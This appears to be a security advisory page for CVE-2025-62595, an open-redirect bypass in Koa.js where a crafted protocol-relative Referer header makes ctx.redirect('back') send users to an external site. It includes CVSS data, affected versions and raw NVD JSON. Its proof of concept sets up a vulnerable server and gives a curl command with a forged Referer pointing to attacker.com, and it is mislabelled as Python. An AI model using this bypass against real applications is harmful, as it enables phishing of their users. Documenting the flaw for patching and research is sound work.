Security Vulnerability Report
中文
CVE-2025-62595 CVSS 4.3 MEDIUM

CVE-2025-62595

Published: 2025-10-21 17:15:41
Last Modified: 2026-01-20 14:45:48
Source: [email protected]

Description

Koa is expressive middleware for Node.js using ES2017 async functions. In versions 2.16.2 to before 2.16.3 and 3.0.1 to before 3.0.3, a bypass to CVE-2025-8129 was discovered in the Koa.js framework affecting its back redirect functionality. In certain circumstances, an attacker can manipulate the Referer header to force a user’s browser to navigate to an external, potentially malicious website. This occurs because the implementation incorrectly treats some specially crafted URLs as safe relative paths. Exploiting this vulnerability could allow attackers to perform phishing, social engineering, or other redirect-based attacks on users of affected applications. This issue has been patched in version 3.0.3.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:koajs:koa:*:*:*:*:*:node.js:*:* - VULNERABLE
cpe:2.3:a:koajs:koa:2.16.2:*:*:*:*:node.js:*:* - VULNERABLE
Koa.js >= 2.16.2, < 2.16.3
Koa.js >= 3.0.1, < 3.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// PoC for CVE-2025-62595 - Koa.js Open Redirect via Referer Header // This PoC demonstrates how to bypass the back redirect protection const Koa = require('koa'); const app = new Koa(); // Vulnerable route that uses ctx.redirect('back') app.use(async (ctx) => { if (ctx.path === '/login') { // After login attempt, redirect back to the referer ctx.redirect('back'); } else { ctx.body = 'Click the link below to test:\n\n<a href="/login">Login (redirects back)</a>'; } }); app.listen(3000, () => { console.log('Vulnerable Koa.js server running on http://localhost:3000'); }); /* * Attack scenario: * * 1. Attacker creates a malicious page at https://attacker.com/phish * 2. The malicious page contains a link like: * <a href="http://victim-koa-app.com/login">Click here for free gift!</a> * * 3. However, the attacker sets the Referer header to a malicious URL: * Using protocol-relative URL bypass: Referer: //attacker.com/phish * * 4. When victim clicks the link, browser sends request with Referer header * containing the attacker's URL * * 5. Koa.js processes ctx.redirect('back') and incorrectly treats * "//attacker.com/phish" as a safe relative path * * 6. Browser interprets "//attacker.com/phish" as an absolute URL * and redirects the victim to attacker's phishing page * * Exploit using curl: * curl -v -H "Referer: //attacker.com/phishing" http://victim-app.com/login * * Expected response: 302 Found with Location: //attacker.com/phishing * Browser will redirect to: https://attacker.com/phishing */

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62595", "sourceIdentifier": "[email protected]", "published": "2025-10-21T17:15:40.737", "lastModified": "2026-01-20T14:45:48.283", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Koa is expressive middleware for Node.js using ES2017 async functions. In versions 2.16.2 to before 2.16.3 and 3.0.1 to before 3.0.3, a bypass to CVE-2025-8129 was discovered in the Koa.js framework affecting its back redirect functionality. In certain circumstances, an attacker can manipulate the Referer header to force a user’s browser to navigate to an external, potentially malicious website. This occurs because the implementation incorrectly treats some specially crafted URLs as safe relative paths. Exploiting this vulnerability could allow attackers to perform phishing, social engineering, or other redirect-based attacks on users of affected applications. This issue has been patched in version 3.0.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:koajs:koa:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "3.0.1", "versionEndExcluding": "3.0.3", "matchCriteriaId": "4A627ED5-2951-46B1-BFF3-E633EE820936"}, {"vulnerable": true, "criteria": "cpe:2.3:a:koajs:koa:2.16.2:*:*:*:*:node.js:*:*", "matchCriteriaId": "23C668B2-3773-49E0-9274-7C8824F59CB0"}]}]}], "references": [{"url": "https://github.com/koajs/koa/commit/769fd75cc6b30d72493b370b5a3ae2332ca03c5b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/koajs/koa/security/advisories/GHSA-g8mr-fgfg-5qpc", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/koajs/koa/security/advisories/GHSA-g8mr-fgfg-5qpc", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.